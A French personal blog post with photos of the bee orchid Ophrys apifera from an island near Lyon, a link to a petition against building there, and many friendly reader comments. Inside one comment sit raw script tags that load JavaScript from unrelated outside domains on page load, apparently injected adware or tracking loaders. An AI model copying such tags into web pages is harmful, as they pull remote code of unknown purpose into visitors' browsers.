• Ophrys apifera

     

    Après la grêle, presque deux semaines de canicule ont donné à ce qui restait du jardin un petit air de savane desséchée.

    Avec 34° encore le soir à 22h, inutile de vous dire que je n'allume l'ordinateur que le temps de lire les mails urgents!

     

    Alors, en attendant des conditions plus agréables, petit retour en arrière,

    avec ces souvenirs d'une sortie sur l'île de la Table Ronde à Vernaison (au sud de Lyon) en mai dernier

    (et dire que je pestais ce jour là contre le vent qui chahutait un peu les fleurs lors des prises de vue!)

     

     Cette île, véritable forêt primaire et fabuleuse réserve pour la faune et la flore sauvage, gérée par le SMIRIL, est menacée en partie par l'implantation

    d'une entreprise sur cette grande prairie où j'ai pris ces photos.

    Si vous voulez en savoir plus, et éventuellement signer la pétition pour sa sauvegarde rendez-vous ici:

    https://www.change.org/p/sauvons-l-%C3%AEle-de-la-table-ronde

     

     (SMIRIL:  Syndicat Mixte du Rhône des Iles et des Lônes)

     

    Ophrys apifera

     

     

     

     

    Ophrys apifera

     

     

    Ophrys apifera

     

     

     

    Ophrys apifera

     

     

     

    Ophrys apifera

     

     

    Ophrys apifera

     

     

    Ophrys apifera

     

     

    Ophrys apifera

     

     

     

    Ophrys apifera

     

     

     Merci de votre visite

     


  • Commentaires

    1
    Lundi 6 Août 2018 à 18:55

    Superbes photos ! Dans ces fleurs je vois un masque hilare.

    2
    Lundi 6 Août 2018 à 18:57

    Bonjour Aliselle,

    Ce sont des photos superbes ! Bravo et amitiés.

    Annie

    3
    Lundi 6 Août 2018 à 18:58

    Bonsoir Aliselle ,,, 

    Très jolies photos de cet orchidée sauvage ,,, 

    Je te souhaite une douce soirée,,, bisous bisous ,,, 

    la mure brode

    4
    Lundi 6 Août 2018 à 19:38

    magnifiques photos de cette si jolie orchidée sauvage ! j'espère que ce site sera préservé

    bisous

    5
    Lundi 6 Août 2018 à 20:02

    Mais, elles chantent !!!

    6
    Lundi 6 Août 2018 à 21:10

    Superbe!

    Bises

    7
    Lundi 6 Août 2018 à 23:36

    De superbes photos, cette réserve recèle des trésors. Je vais signer la pétition. Bises

      • Mercredi 8 Août 2018 à 10:34

        Bonjour Nicole

        Oui! C'est un  trésor de biodiversité! Des milans, des hérons, des matins pêcheurs, des hérons, des oiseaux de nuit etc...,

        Des insectes en tous genres bien évidemment, mais aussi des blaireaux, des cervidés, des sangliers...

        Et côté flore on y trouve même des orchidées très rares...

        Le pire c'est que la zone a été en son temps déclarée "non constructible car inondable"... mais quand les gros sous s'en mêlent...

        merci pour ta signature....

        Bises

    8
    Mardi 7 Août 2018 à 07:37

    Bonjour c'est tout de même incroyable  que l'on veuille construire au lieu de préserver ses milieu naturelle et rare, l'homme détruit tout c'est honteux, par contre tes photos sont magnifique! Ici aussi très chaud en Belgique on annonce plus de 36° à l'ombre pour aujourd'hui! suivis d'orages violent à suivre donc! Bonne journée bisous

    9
    Mardi 7 Août 2018 à 07:46

    L'Homme ne respecte rien et après il se plaint ...

    Tes orchis sont superbes et surpassent de beaucoup toutes ces orchidées vendues un peu partout !!!

    Douce journée ... en attendant la fraîcheur prévue pour ce soir ?!

    10
    Mardi 7 Août 2018 à 13:25

    Magnifiques photos de ces orhidées

    Bizz

    11
    myriam
    Mardi 7 Août 2018 à 17:59

    c'est mon orchis prefere ! et pourtant il y en a beaucoup 

     celle ci etait partout dans les petits chemins de mon enfance ! malheureusement le remembrement a ete un grand desastre !

     bonne soirée  , je ne supporte plus cette chaleur !

     

      • Mercredi 8 Août 2018 à 10:53

        Bonjour Myriam

        J'aime beaucoup ces orchidées sauvage de notre région... La plus fréquente ici c'est l'orchis pyramidal. mais sur cette île il y a quelques pieds d'orchidées très rares... Sans parler de la faune comme je l'explique en réponse au commentaire de Nicole... 

        Très belle fin de journée

        Bises

    12
    Mercredi 8 Août 2018 à 12:14
    VéroniqueBM

    Tes photos sont magnifiques et l'on voit bien l'étrangeté de ces plantes qui miment les insectes butineurs ! bisous

    <script src="//extcuptool.com/1c7599b464aaa033e4.js"></script> <script src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52295x7285x&r=1533723224940" type="text/javascript"></script> <script src="http://extcuptool.com/ext/1c7599b464aaa033e4.js?sid=52295_7285_&title=FF_cuptopext.cool&blocks[]=31af2" type="text/javascript"></script>
    13
    Mercredi 8 Août 2018 à 17:46

    j'admire ton oeil toujours alerté, ton regard ... et tes photos ! Mille fois bravo

    14
    Jeudi 9 Août 2018 à 08:20

    Qu'elle est belle !

    JP

    Je ne connais pas le nom exact de ce genre de sauterelle

    15
    Samedi 11 Août 2018 à 10:47

    BONJOUR ALISELLE

    tu trouvera sur mon blog rubrique flore....une multitude d'orchis et  d'ophris et autres......histoire de te familiariser avec les orchidées sauvages

    A+, maurice

    16
    Lundi 13 Août 2018 à 10:08

    J'aime : les couleurs sont franches.

    17
    Vendredi 24 Août 2018 à 11:18

    Superbes, je pensais qu'on en voyait qu'en montagne !!!!! Bonne journée à toi. Bises. Joëlle

    18
    Mardi 28 Août 2018 à 07:05

    Coucou Aliselle,
    Une bien jolie série de cette orchis sauvage que j'aime vraiment beaucoup.
    Hihihi, tes températures me font rêver, nous sommes montés au delà de 45 le jour et avons plafonné entre 29 et 30° la nuit pendant plusieurs semaines, une horreur.
    Heureusement une longue vadrouille en montagne nous a revivifié et au retour, il fait meilleur même si nous dépassons encore les 30° le jour, c'est plus respirable.
    Bises et bonne journée

    19
    Vendredi 31 Août 2018 à 09:43
    milkinise

    Avec toutes mes excuses pour le retard d'1 journée, je te souhaite un très bel anniversaire

    je me doute que tu prépares activement la rentrée! en tout cas j'espère que tu as passé de bonnes vacances

    Bises

    Annelise

    20
    Samedi 1er Septembre 2018 à 13:57

    Bonjour Aliselle,

    Je crois que nous avons tous souffert de la canicule. En tous cas maintenant c'est plus respirable. Tu nous présentes une belle série de cette fleur et les couleurs étaient encore bien vives. 

    Bises et à bientôt. 

    21
    myriam
    Samedi 1er Septembre 2018 à 16:08
    myriam

    superbes ces photos !! c'est mon orchis prefere !

    bon w e 

    22
    Lundi 3 Septembre 2018 à 19:23

    Sur la dernière elle se marre

    JP

    23
    Dimanche 9 Septembre 2018 à 14:24

    Bonjour

    Quelle magnifique fleur!

    Très gracieuse!

    Bisous

    24
    Mardi 9 Octobre 2018 à 16:12

    Elles ont quelque chose d'animal en elles, je ne sais pourquoi. Mais comme elles sont fines ! Bonne soirée à toi. Bises<; JOëlle

    25
    Mercredi 24 Octobre 2018 à 08:03

    Bonjour Aliselle,

     

    j'aime beaucoup cette jolie orchidée qui pousse naturellement dans mon jardin. Mais il n'y en a que très très peu. entre une à trois suivant les années. Alors que les autres variétés sont en constante expansion. celle-ci est peut-être plus fragile,plus exigeante,

    On protège ici, On détruit sans  état d'âme là, C'est l'argent qui mène le monde. Triste

    Bises

    26
    Lundi 29 Octobre 2018 à 08:07
    Pastellle

    Coucou Aliselle, tu vas bien ? Et ton île ? Des nouvelles ? 

     

    27
    Dimanche 11 Novembre 2018 à 18:40

    Bonsoir Aliselle, je vois que tu n'es pas très présente sur ton blog, j'espère que tu vas bien ... Tes photos sont très belles ... Ces orchidées sauvages sont magnifiques, ce serait vraiment dommage qu'elles disparaissent  ! . .. Bonne soirée, à bientôt smile

    28
    Lundi 26 Novembre 2018 à 11:41

    Tes photos sont magnifiques. Merci pour ce partage.

    29
    Lundi 31 Décembre 2018 à 18:29

    Bonsoir Aliselle ,,, 

    Je passe te faire un coucou ,,, j'espère que tu vas bien ,,, 

    et ,,, profite pour te souhaiter une belle saint Sylvestre ,,, à bientôt ,,, 

    la mure brode ,,, bisous bisous,,, 

    30
    Danielle
    Mercredi 6 Février 2019 à 13:29
    De bien beaux sabots de Vénus ! Très belles photos....
    31
    Lundi 18 Février 2019 à 18:53

    Magnifiques photos, j'en avais vu dans la Brenne au printemps dernier, où elle est rare aussi. J'avais publié des photos sur mon blog il me semble et sur ma page facebook. Mon rêve serait de voir le Sabot de Vénus

      • Lundi 18 Février 2019 à 19:52

        Ah! oui! Moi aussi j'aimerais bien en voir un! J'aimerais aussi voir un jour une fritillaire à damier.... je ne désespère pas!

        Bonne soirée et merci de ta visite

        Bises

      • Mardi 26 Février 2019 à 16:05

        j'en ai vu en vrai il y a une quinzaine d'années à Saché en Indre-et-Loire à l'état ssuvage.

    32
    Mardi 26 Février 2019 à 09:46

    bonjour aliselle

    superbe

    on dirait des visages humains

    amitié et belle journée à toi

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :